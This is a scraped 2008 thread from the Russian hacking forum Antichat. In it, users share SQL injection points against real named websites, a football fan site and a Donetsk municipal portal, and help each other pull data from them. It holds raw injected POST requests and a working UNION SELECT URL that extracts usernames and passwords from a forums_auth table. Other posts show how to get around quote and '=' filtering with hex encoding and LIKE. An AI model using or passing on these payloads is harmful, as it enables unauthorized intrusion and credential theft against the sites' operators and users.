Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.02.2008, 05:31
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
да нет, это просто названия типов mysql и mysql5... mysql5 хеши поддерживаются начиная с mysql 4.1 если хочешь работать со старыми хешами (mysql) то мускульный демон надо запускать с параметром --old-passwords, при этом mysql5 хеши как понимаешь никуда не деваются, а остаются в mysql.user
__________________
Карфаген должен быть разрушен...
|
|
|
26.02.2008, 18:51
|
|
Новичок
Регистрация: 06.02.2008
Сообщений: 4
Провел на форуме:
34554
Репутация:
1
|
|
http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&t ype=DESC
POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
name=1&mail=1&url=1&captcha=1&captcha_hash='&refer er=1&parentID=1&type=1&ip=1&savevisitorcomment=1
POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha =1&captcha_hash='&save=1
Скажите как вытянуть отсюда что-нибудь!!!!???
|
|
|
|
26.02.2008, 19:45
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
Сообщение от wol4ara2
http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&t ype=DESC
POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
name=1&mail=1&url=1&captcha=1&captcha_hash='&refer er=1&parentID=1&type=1&ip=1&savevisitorcomment=1
POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha =1&captcha_hash='&save=1
Скажите как вытянуть отсюда что-нибудь!!!!???
чет непашет твой сайтец
или у меня чет невыходит
|
|
|
|
26.02.2008, 20:50
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Только учусь!
------------------------------
нашел скулю
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
-------------------------------
5.0.37-log
life
life@localhost
-------------------------------
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/*
-------------------------------
есть интересные таблицы: (но я их не перебирал)
board_admin_comment
f1
f1_bodies
f2
f2_bodies
f3
f3_bodies
f4
f4_bodies
f5
f5_bodies
forums
forums_auth
forums_forum2group
forums_groups
forums_moderators
forums_user2group
gal_user
guide
mail_archieve
maillist
maillist_users
poll_poll
poll_vote
prob
---------------------
сколько ни пробовал не получается делать запросы ттипа:
from+information_schema.columns+where+teble_name=' user'(в этом случае 'forums_auth')+limit,1,1/*
приходится перебирать ручками 
ПОДСКАЖИТЕ может что не так делаю? |
|
|
|
26.02.2008, 21:17
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
samarin у тебя ошибка с слове "teble_name",но думаю ты не об этом ,что значит не получается?
|
|
|
|
26.02.2008, 21:51
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
samarin у тебя ошибка с слове "teble_name",но думаю ты не об этом ,что значит не получается?
за ошибку я знаю-опечаска 
да вот когда пытаюсь сделать этот запрос-выдает ошибку-и это не первый сайт
приведи пример например на этом сайте
|
|
|
|
26.02.2008, 22:17
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от samarin
за ошибку я знаю-опечаска
да вот когда пытаюсь сделать этот запрос-выдает ошибку-и это не первый сайт
приведи пример например на этом сайте захекси user
from+information_schema.columns+where+table_name=0 x75736572 (в твоем случае 0x666F72756D735F61757468)
ошибка из-за экранирования кавычек
__________________
Карфаген должен быть разрушен...
|
|
|
|
26.02.2008, 22:29
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Scipio
На этом сайте не катит,"char" тоже,лично я первый раз такое вижу,кто объяснит?
|
|
|
|
26.02.2008, 22:43
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
ага понял... там блин = фильтруется надо like пользовать
Код:
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,column_name,6,7,8,9,10/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'forums_auth'/**/limit/**/1,1/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
26.02.2008, 23:01
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
samarin
Это часный случай хитрых хохлов,а вообще переводи либо в Hex либо в char вот ссылка
_http://snak3.h17.ru/tools/
Scipio спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
